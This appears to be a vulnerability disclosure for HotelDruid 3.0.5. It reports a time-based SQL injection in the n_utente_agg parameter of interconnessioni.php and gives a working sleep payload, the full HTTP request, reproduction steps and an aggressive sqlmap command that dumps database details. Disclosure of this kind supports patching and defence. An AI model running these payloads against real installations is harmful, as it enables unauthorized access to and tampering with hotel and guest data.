Affected Version: hoteldruid version 3.0.5

Product Link: https://www.hoteldruid.com/

Product Download Link: https://www.hoteldruid.com/download/hoteldruid_3.0.5.zip

Security Issue:

SQL injection via POST parameter n_utente_agg

URL: <http://localhost/hoteldruid/interconnessioni.php>
Method: POST
Vulnerable Parameter: n_utente_agg
Payload: 1' AND (SELECT 3869 FROM (SELECT(SLEEP(5)))qSXB)-- QMbZ

Vulnerability Description:

SQL injection (SQLi) refers to an injection attack wherein an attacker can execute malicious SQL statements that control a web application's database server.

Process to reproduce:

1. Copy the HTTP Request below
2. Save the file as sqli_1.txt 
3. Run the sqlmap command below to see the extracted data from the database

HTTP Request:

POST /hoteldruid/interconnessioni.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----------YWJkMTQzNDcw
Accept: */*
Referer: <http://localhost/hoteldruid/>
Content-Length: 515
Accept-Encoding: gzip,deflate,br
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36
Host: localhost
Connection: Keep-alive

------------YWJkMTQzNDcw
Content-Disposition: form-data; name="anno"

2023
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="id_sessione"

------------YWJkMTQzNDcw
Content-Disposition: form-data; name="modifica_interconnessione"

SI
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="modifica_utente_agg"

SI
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="n_utente_agg"

1' AND (SELECT 3869 FROM (SELECT(SLEEP(5)))qSXB)-- QMbZ
------------YWJkMTQzNDcw--

HTTP Response:

Untitled

Proof of Exploit:

SQL query - SELECT database()
hoteldruid

Screenshot:

Untitled

Command used: sqlmap -r sqli_1.txt -p n_utente_agg --risk 3 --level 5 --dbs --current-user --current-db

The impact of this vulnerability:

An attacker can use SQL injection to bypass a web application's authentication and authorization mechanisms and retrieve the contents of an entire database. SQLi can also be used to add, modify and delete records in a database, affecting data integrity. Under the right circumstances, SQLi can also be used by an attacker to execute OS commands, which may then be used to escalate an attack even further.